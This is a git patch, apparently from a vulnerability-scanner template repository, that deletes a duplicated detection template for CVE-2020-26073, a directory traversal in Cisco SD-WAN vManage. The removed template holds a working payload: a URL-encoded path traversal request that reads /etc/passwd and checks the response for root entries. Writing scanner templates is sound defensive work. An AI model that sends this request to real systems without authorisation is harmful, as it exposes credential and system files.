From 7b447029466eeb7f365166cfcaed61006fb9bc26 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 6 Apr 2021 15:40:01 +0200 Subject: [PATCH] Remove duplicated CVE-2020-26073 template --- cves/2020/CVE-2020–26073.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 cves/2020/CVE-2020–26073.yaml diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml deleted file mode 100644 index 47d9a67723..0000000000 --- a/cves/2020/CVE-2020–26073.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2020-26073 -info: - name: Cisco SD-WAN vManage Software Directory Traversal - author: madrobot - severity: high - description: | - A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - - The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. - reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - tags: lfi,cve,cve2020,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - words: - - "root:[x*]:0:0:" - part: body